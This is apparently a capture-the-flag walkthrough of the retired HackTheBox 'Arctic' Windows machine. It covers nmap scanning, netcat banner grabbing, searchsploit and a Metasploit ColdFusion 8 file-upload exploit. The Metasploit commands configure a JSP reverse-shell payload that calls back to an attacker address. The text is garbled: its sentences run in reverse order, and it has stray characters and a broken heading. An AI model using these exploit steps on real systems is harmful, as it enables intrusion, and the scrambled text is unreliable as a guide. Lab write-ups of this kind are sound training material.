Msf5 exploit(windows/http/coldfusion_fckeditor) > set LHOST 10.10.14.6 Smsf5 exploit(windows/http/coldfusion_fckeditor) > set PAYLOAD java/jsp_shell_reverse_tcp Msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500 Msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11 Msf5 > use exploit/windows/http/coldfusion_fckeditor Let us exploit the vulnerability to get user shell. Tried second one because it could give us the shell and I was able to get user shell easily. $searchsploit coldfusion 8 | grep Metasploit One is for Directory Traversal and other is for Arbitrary File Upload. There are also two exploits whose metasploit module is present, so I grepped them. Searchsploitlisted many numbers of potential exploits and most of them are of XSS. Soon I get any service and its version I immediately search for exploit using searchsploit(an exploit-db querying tool). It revealed that Adobe ColdFusion 8 is using this port.
This web server has more loading time so you have to wait 20-30 sec to access its files.Īfter some enumeration found this. This confirms that a web Server is running on port 8500. In its, first line it is written ‘ allow remote access as Web Server’, so I immediately go to the URL and after 20-30 sec of wait it showed me a web page. Then tried to google for FMTP service and port associated with it. Since nmap could not confirm the exact version of service on port 8500 so I tried to manually banner grab the service on this port using netcat. After some googling found that, it is a Flight Message Transfer Protocol and is used to exchange information between Flight Data Processing Systems and Air Traffic Control Unit (ATCU).
Did not know anything about FMTP service. msrpcservice on port 135& 49154and FMTPservice on port 8500 are running. Nmap revealed ports 135, 8500, and 49154 are open. Used Nmap for this task and the result is below- Scanning As usual I started by scanning the machine.
#METERPRETER EXPLIT SUGGESTER PC#
Before starting, connect your PC with VPN and make sure your connectivity with Arctic machine by pinging the IP 10.10.10.11. This machine is currently retiredso you will require VIPsubscription at to access this machine. Therefore, you have to be very fast and accurate to root this box before your session died. You may lose your meterpreter session when the connection from the server get lost. In addition, the connection from the server get lost after about 120 ping requests. To exploit this machine with metasploit you should have patiencebecause the FMTP server running on this box possess a long load time about 20-30 sec to respond back with the request. NOTE: Although there are other methods to solve this box, but I rooted this box using metasploit. It is a Windowsmachine with IP address 10.10.10.11 and difficulty easyassigned by its maker. Before starting let us know something about this machine. In this writeup, I have demonstrated step-by-step how I rooted to Arctic HTB machine. This is Arctic HackTheBox machine walkthrough and is the 7th machine of our OSCP like HTB boxes series.
0 kommentar(er)
